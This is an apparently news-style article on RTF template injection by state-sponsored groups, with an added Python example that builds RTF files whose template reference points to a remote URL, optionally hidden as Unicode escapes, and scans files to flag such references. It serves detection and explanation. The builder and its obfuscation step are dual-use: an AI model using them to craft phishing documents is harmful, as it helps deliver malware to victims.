Several state-sponsored threat actors have been observed using a technique called RTF template injection in recent phishing campaigns to deliver malware to targeted systems.
The Rich Text Format (RTF) is a document format created by Microsoft that can be opened with Microsoft Word, WordPad, and other applications available on nearly every operating system. The attack abuses the template feature built into the format: an RTF file can reference a template (via the `\*\template` control word) that specifies how the document's text should be formatted, and that template is normally a file stored locally on the system. Threat actors have found that the reference can be pointed at a URL instead, so that the application fetches a remote resource when the document is opened, turning the template feature into a downloader for a secondary payload. Modifying an RTF document this way is simple: RTF is a plain-text format, so the attacker only needs to edit the file (in a hex or text editor) to add the template control word followed by a URL that hosts the payload. The format also supports Unicode escape sequences, so the URL can be written as a sequence of `\uN` escapes rather than as plaintext, which defeats naive string matching on the file and further evades detection.
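The following added example (not code from the original article or from any of the groups it describes) shows both sides of the technique just described: it builds a minimal RTF document whose `\*\template` destination holds a reference, optionally written entirely as `\uN` Unicode escapes, and it scans an RTF byte string for template destinations, decodes the RTF escapes the way the format defines them, and flags any reference that resolves to a remote location (HTTP, HTTPS, FTP or a UNC path). The URLs, paths and document text are constructed placeholders; the decoder assumes the `\uc1` default (one fallback character per `\uN` escape) and a cp1252 code page for `\'hh` escapes.

```python
"""Added example (not from the article): build and detect RTF template injection.

An RTF file can carry a template reference in a {\\*\\template ...} destination.
Pointing it at a URL makes the opening application fetch a remote resource;
writing the URL as RTF Unicode escapes (\\uN) hides it from plain string matching.
Escape handling follows the RTF specification; URLs and paths are placeholders.
"""
import re

# \uN is a signed 16-bit decimal code unit followed by one fallback character
# (the \uc1 default); \'hh is one byte in the document code page.
_TOKEN = re.compile(
    rb"\\u(?P<u>-?\d+) ?(?:\\'[0-9a-fA-F]{2}|[^\\])?"   # \uN + fallback char
    rb"|\\'(?P<hex>[0-9a-fA-F]{2})"                      # \'hh hex escape
    rb"|\\(?P<word>[a-zA-Z]+)(?:-?\d+)? ?"               # other control word
    rb"|\\(?P<sym>.)"                                    # control symbols \\ \{ \}
    rb"|(?P<text>[^\\\r\n])"                             # plain text
    rb"|[\r\n]",                                         # line breaks carry no text
    re.S,
)
# Body runs to the first unescaped closing brace.
_TEMPLATE = re.compile(rb"\{\\\*\\template\b ?(?P<body>(?:\\.|[^\\}])*)\}", re.S)
_UNICODE_ESC = re.compile(rb"\\u-?\d+")
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "\\\\")


def rtf_escape(s: str) -> str:
    """Escape the three characters that are special inside RTF text."""
    return s.replace("\\", "\\\\").replace("{", "\\{").replace("}", "\\}")


def unicode_escape(s: str) -> str:
    """Write each character as \\uN? (N negative for code units >= 0x8000)."""
    return "".join(
        f"\\u{ord(c) - 0x10000 if ord(c) >= 0x8000 else ord(c)}?" for c in s)


def build_rtf(template_ref: str, obfuscate: bool = False) -> bytes:
    """Minimal RTF document whose \\*\\template destination holds template_ref.
    With obfuscate=True the reference is written entirely as \\uN escapes."""
    ref = unicode_escape(template_ref) if obfuscate else rtf_escape(template_ref)
    doc = ("{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0 Calibri;}}"
           "{\\*\\template " + ref + "}"
           "\\pard Quarterly figures attached.\\par}")   # constructed body text
    return doc.encode("cp1252")


def decode_rtf_text(body: bytes) -> str:
    """Resolve RTF escapes in a destination body to the text the reader sees.
    Assumes \\uc1 and a cp1252 code page for \\'hh escapes (assumptions)."""
    out = []
    for m in _TOKEN.finditer(body):
        if m.group("u") is not None:
            n = int(m.group("u"))
            out.append(chr(n + 0x10000 if n < 0 else n))
        elif m.group("hex") is not None:
            out.append(bytes.fromhex(m.group("hex").decode()).decode("cp1252", "replace"))
        elif m.group("sym") is not None:
            out.append(m.group("sym").decode("latin-1"))
        elif m.group("text") is not None:
            out.append(m.group("text").decode("latin-1"))
        # other control words carry no text and are dropped
    return "".join(out).strip()


def scan_rtf(rtf: bytes) -> list:
    """One (reference, is_remote, is_unicode_obfuscated) tuple per \\*\\template
    destination. A remote reference is the injection indicator; a local path,
    the legitimate use of the control word, is reported but not flagged."""
    results = []
    for m in _TEMPLATE.finditer(rtf):
        body = m.group("body")
        ref = decode_rtf_text(body)
        remote = ref.lower().startswith(REMOTE_PREFIXES)
        obfuscated = _UNICODE_ESC.search(body) is not None
        results.append((ref, remote, obfuscated))
    return results


if __name__ == "__main__":
    samples = {                                        # all constructed inputs
        "plaintext URL": build_rtf("https://example.invalid/t.dotm"),
        "unicode URL": build_rtf("https://example.invalid/t.dotm", obfuscate=True),
        "UNC path": build_rtf("\\\\files.example.invalid\\share\\t.dotm"),
        "local template": build_rtf("C:\\Templates\\Normal.dotm"),
    }
    for name, doc in samples.items():
        for ref, remote, obf in scan_rtf(doc):
            verdict = "INJECTION" if remote else "ok"
            print(f"{name:15} {verdict:9} obfuscated={obf!s:5} {ref}")
```

The decoder is the important half: a rule that only greps for `http` in the file catches the plaintext variant and misses the Unicode-escaped one, whereas resolving the escapes first makes the two samples indistinguishable to the check. The `obfuscated` flag is reported separately because an escape-encoded template reference is itself suspicious even before the decoded value is inspected.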
Three state-sponsored threat actors have been seen using this technique over the past year: the India-based DoNot Team, the Russian-backed Gamaredon group, and the Chinese threat actor TA423. The samples obtained from these groups differ in whether the URL is obfuscated: DoNot Team's samples encode the URL with Unicode escapes, whereas Gamaredon and TA423 leave the URL in plaintext within the RTF file. Threat researchers expect the technique to be adopted by further threat actors, since its effectiveness and ease of use make it an efficient attack.